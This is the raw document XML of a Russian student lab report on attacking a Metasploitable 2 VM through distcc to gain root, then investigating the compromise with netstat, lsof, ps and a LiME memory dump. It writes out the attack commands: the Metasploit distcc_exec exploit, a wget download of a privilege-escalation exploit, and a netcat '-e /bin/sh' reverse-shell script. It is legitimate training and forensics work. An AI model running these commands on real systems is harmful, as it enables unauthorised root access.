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jc w:val="center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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Лабораторная работа №</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Использование </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t xml:space="preserve">DISTCC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">для получения прав </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t xml:space="preserve">root. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Создание дампа памяти </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lime </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>и его анализ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Основной текст"/>
        <w:jc w:val="center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jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:lang w:val="ru-RU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Кондратьев Артём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11-901</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Основной текст"/>
        <w:jc w:val="center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1)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Создание виртуальной машины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Kali Linux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и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 2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были выполнены в рамках предыдущих лабораторных работ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2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Kali Linux 2021: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74940" cy="2697010"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741825" name="officeArt object" descr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38.png" descr="image38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940" cy="2697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2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Metasploitable 2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71084" cy="2675035"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741826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3.png" descr="image13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084" cy="2675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2)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Настройка сети между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и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>Kali Linux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Узнать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ip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адрес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Metasploitable,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используя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ifconfig -a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или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ip addr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67138" cy="2651729"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741827" name="officeArt object" descr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47.png" descr="image4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651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Узнать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ip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адрес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Kali Linux,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используя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ifconfig -a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или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ip addr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90065" cy="2069018"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741828" name="officeArt object" descr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33.png" descr="image3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065" cy="2069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3)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Атака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Проверка портов через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de-DE"/>
        </w:rPr>
        <w:t>NMAP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Основной текст"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr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Сканирование портов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Metasploitable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 помощью </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">NMAP.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Выполним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nmap -p 1-65535 -T4 -A -v </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>192.168.50.121</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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2&gt;&amp;1 | tee /var/tmp/scan.txt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784481" cy="1852613"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741829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14.png" descr="image1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481" cy="1852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86188" cy="3160049"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741830" name="officeArt object" descr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43.png" descr="image4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3160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792453" cy="1354448"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741831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12.png" descr="image1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453" cy="1354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00475" cy="1357313"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741832" name="officeArt object" descr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34.png" descr="image34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357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 т</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>.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д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Конечный вывод работы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>NMAP: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843338" cy="1244935"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741833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16.png" descr="image1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244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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:after="24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Теперь нужно убедиться в том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что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distcc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запущен на порту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3632,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используя для этого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grep 3632 /var/tmp/scan.txt</w:t>
      </w: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871913" cy="565994"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741834" name="officeArt object" descr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46.png" descr="image46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565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6"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:after="24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Убедимся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что файл </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t xml:space="preserve">scan.txt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сохранился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Для этого перейдем в раздел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cd /var/tmp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и откроем файл через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cat scan.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Основной текст"/>
        <w:spacing w:before="240" w:after="240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897258" cy="2821857"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741835" name="officeArt object" descr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48.png" descr="image48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258" cy="2821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>4)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Атака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Запуск эксплоита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distcc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используя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>Metasploit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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Запустим консоль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выполнив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it-IT"/>
        </w:rPr>
        <w:t>msfconsole</w:t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3870163" cy="3226786"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741836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9.png" descr="image9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163" cy="3226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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Основной текст"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Выполним поиск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distcc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эксплоита командой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>search distcc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901402" cy="933226"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741837" name="officeArt object" descr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31.png" descr="image3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02" cy="9332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Запустим эксплоит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fr-FR"/>
        </w:rPr>
        <w:t>use exploit/unix/misc/distcc_exec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929063" cy="541715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741838" name="officeArt object" descr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36.png" descr="image36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541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Посмотрим список доступных загрузчиков командой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show payloads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944113" cy="1727731"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741839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0.png" descr="image1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113" cy="172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Выберем загрузчик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set payload cmd/unix/bind_ruby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929063" cy="261067"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741840" name="officeArt object" descr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37.png" descr="image37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610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Просмотрим список настроек загрузчика командой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show options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957261" cy="1623660"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741841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20.png" descr="image20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261" cy="1623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Установим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IP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адрес машины жертвы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 set RHOST 192.168.50.121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986213" cy="297973"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741842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27.png" descr="image27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979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>5)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Атака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Получение доступа к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>Metasploitable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Для получения доступа к удаленной машине выполним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fr-FR"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w: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Убедимся в получении доступа выполнив команды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hostname, ifconfig eth0, whoami</w:t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4127907" cy="1556536"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741843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7.png" descr="image17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907" cy="1556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Расширяем права доступа до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 root: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pt-PT"/>
        </w:rPr>
        <w:t>sudo su</w:t>
      </w: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Теперь скачаем эксплоит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: exploit-8572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через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wget --no-check-certificate http://www.computersecuritystudent.com/DOWNLOADS/8572 -O exploit-8572.c</w:t>
      </w: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i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="ru-RU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Убедимся в наличие файла командой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fr-FR"/>
        </w:rPr>
        <w:t>: ls -l exploit-8572.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с</w:t>
      </w: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i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="ru-RU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Скомпилируем эксплоит командой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fr-FR"/>
        </w:rPr>
        <w:t>: gcc exploit-8572.c -o exploit-8572</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Основной текст"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="ru-RU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Убедимся в наличии исполняемого файла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fr-FR"/>
        </w:rPr>
        <w:t>: ls -l exploit-8572*</w:t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4081463" cy="895706"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741844" name="officeArt object" descr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42.png" descr="image42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895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>5)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Атака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Получение доступа к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fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploitable.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Продолжение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Создание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netcat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сессии для удаленного управления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Для этого откроем новую консоль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(Ctrl + Alt + T)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 выполним в ней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netcat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nl-NL"/>
        </w:rPr>
        <w:t>vlp 4444</w:t>
      </w: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Создается новое подключение прослушивающее порт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>4444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3262313" cy="897418"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741845" name="officeArt object" descr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29.png" descr="image29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8974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5210175" cy="1143000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741846" name="officeArt object" descr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39.png" descr="image39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4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Использование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exploit-8572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для предоставления удаленной консоли с правами </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t xml:space="preserve">root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по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netcat.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Создаем скрипт для предоставления консоли по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netcat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выполнив следующие команды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s-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve">echo '#!/bin/sh' &gt; /tmp/run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s-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> echo '/bin/netcat -e /bin/sh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>192.168.50.121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 xml:space="preserve"> 4444' &gt;&gt; /tmp/run</w:t>
      </w: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Определим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pid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менеджера устройств выполнив команду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ps -eaf | grep udev | grep -v grep</w:t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inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4090702" cy="878905"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741847" name="officeArt object" descr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45.png" descr="image45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702" cy="8789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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Основной текст"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Из полученного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pid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вычитаем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1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для имитации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pid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родительского процесса и выполним команду </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>(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без кавычек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):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fr-FR"/>
        </w:rPr>
        <w:t>./exploit-8572 &lt;2398 - 1&gt;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148138" cy="1674414"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741848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3.png" descr="image3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674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6)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Форензика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>.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Выявление аномальной активности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Привязываем сетевые подключения к идентификаторам процессов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Выполним команду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netstat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noap | less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329113" cy="841372"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741849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1.png" descr="image21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841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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/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Выполните команды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ps -eaf | grep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 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RUBY_PID | grep -v grep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357688" cy="456037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741850" name="officeArt object" descr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8.png" descr="image18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456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>ps -eaf | grep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 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SH_PID | grep -v grep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338638" cy="281075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741851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8.png" descr="image8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281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shd w:val="clear" w:color="auto" w:fill="ffffff"/>
        <w:ind w:firstLine="62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  ps -eaf | grep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 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P_SH_PID | grep -v grep </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Основной текст"/>
        <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
        <w:ind w:firstLine="62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 </w:t>
      </w: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395788" cy="533400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741852" name="officeArt object" descr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8.png" descr="image28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Просматривая какие файлы используются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netcat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сессией на порту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4444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командой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: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lsof | grep 4444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мы видим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 xml:space="preserve">что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RUBY_PID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 xml:space="preserve"> запущен с правами демона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 xml:space="preserve">в то время как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 xml:space="preserve">SH_PID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 xml:space="preserve">с правами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nl-NL"/>
        </w:rPr>
        <w:t xml:space="preserve">root.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329113" cy="1129022"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741853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15.png" descr="image15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1290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Используем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t xml:space="preserve">lsof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для анализа демона с процессом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RUBY_PID.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Выполним команду </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t xml:space="preserve">lsof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–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p RUBY_PID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386263" cy="1369797"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741854" name="officeArt object" descr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22.png" descr="image22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3697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Используем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t xml:space="preserve">lsof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для анализа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netcat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сессии с процессом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SH_PID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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t xml:space="preserve">root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правами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Выполним команду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nl-NL"/>
        </w:rPr>
        <w:t xml:space="preserve">lsof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p SH_PID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448591" cy="2962403"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741855" name="officeArt object" descr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23.png" descr="image23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591" cy="29624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 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Основной текст"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/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Используем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ps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для анализа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netcat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сессии с процессом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SH_PID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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t xml:space="preserve">root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правами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Выполним команду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ps -eaf | grep -v grep | grep SH_PID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519613" cy="728244"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741856" name="officeArt object" descr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24.png" descr="image24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7282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Также выведем результат команды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 ps -eaf | grep -v grep | grep P_SH_PID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548188" cy="627077"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741857" name="officeArt object" descr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32.png" descr="image32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6270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4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Командой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cat /tmp/run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выведем содержимое скрипта предоставившего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shell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удаленной машине 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shd w:val="clear" w:color="auto" w:fill="ffffff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7)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 xml:space="preserve">Создание дампа памяти с помощью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>LiME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Подготовка директории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Создадим каталог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 xml:space="preserve"> /var/www/distcc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командой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makedir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 xml:space="preserve"> –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p /var/www/distcc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557756" cy="576519"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741858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11.png" descr="image11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756" cy="576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hd w:val="clear" w:color="auto" w:fill="ffffff"/>
        <w:ind w:left="144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6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/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Сменим владельца директории командой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chown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 xml:space="preserve">www-data:www-data /var/www/distcc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595813" cy="349049"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741859" name="officeArt object" descr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30.png" descr="image30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349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Изменим права доступа командой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chmod 755 /var/www/distcc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624388" cy="299587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741860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.png" descr="image2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995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подтвердите правильность выполнения командой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ls -ld /var/www/distcc </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Основной текст"/>
        <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
        <w:ind w:left="720" w:firstLine="0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643438" cy="524509"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741861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7.png" descr="image7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524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144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перейдите в каталог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/var/tmp/src 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командой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cd /var/tmp/src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672013" cy="496692"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741862" name="officeArt object" descr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40.png" descr="image40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496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1440" w:firstLine="0"/>
        <w:jc w:val="both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выполнить создание дампа оперативной памяти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Metasploitable c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помощью команды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: insmod./lime-2.6.24-16-server.ko"path=/var/www/distcc/distcc_memory.lime format=lime"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700588" cy="616855"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741863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6.png" descr="image6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6168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hd w:val="clear" w:color="auto" w:fill="ffffff"/>
        <w:ind w:left="144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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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убедиться в создании дампа командой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -l /var/www/distcc/distcc_memory.lime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767263" cy="693420"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741864" name="officeArt object" descr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35.png" descr="image35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693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ind w:left="720" w:firstLine="0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8)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Создание файлов для форензического анализа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>.</w:t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 </w:t>
      </w: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Сохранение сведений о системе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Перейдем в каталог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/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командой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cd /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824413" cy="633104"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741865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25.png" descr="image25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633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Сохраним сведений о состоянии сетевых соединений и слушаемых на данном компьютере портах командой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de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat -naop &gt; /var/www/distcc/distcc_netstat.txt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691063" cy="615815"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741866" name="officeArt object" descr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44.png" descr="image44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615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Сохраним вывода информации о том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,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какие файлы используются теми или иными процессами в системе командой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nl-NL"/>
        </w:rPr>
        <w:t>lsof &gt; /var/www/distcc/distcc_lsof.txt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729163" cy="715717"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741867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1.png" descr="image1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7157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Сохраним отчет о работающих процессах командой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 xml:space="preserve">ps -eaf &gt; /var/www/distcc/distcc_pseaf.txt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757738" cy="665545"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741868" name="officeArt object" descr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41.png" descr="image41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665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Заархивировать все данные командой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 xml:space="preserve">tar zcvf /var/www/distcc/tmp.tar.gz /tmp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748213" cy="1514381"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741869" name="officeArt object" descr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26.png" descr="image26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5143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Создание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MD5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хеш</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>-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суммы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Перейдем в каталог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/var/www/distcc/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 командой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 xml:space="preserve">cd /var/www/distcc/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776788" cy="642724"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741870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4.png" descr="image4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642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18"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="ru-RU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Выполним создание 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MD5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хеш</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>-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сумм командой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md5sum * | tee distcc_md5.txt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ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both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</w:rPr>
        <w:drawing xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4786313" cy="1025638"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741871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5.png" descr="image5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10256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shd w:val="clear" w:color="auto" w:fill="ffffff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ind w:left="720" w:firstLine="0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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Оформление результатов работы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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Последовательно вывести в консоль </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploitable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результаты выполнения следующих команд и сделать один общий скриншот</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
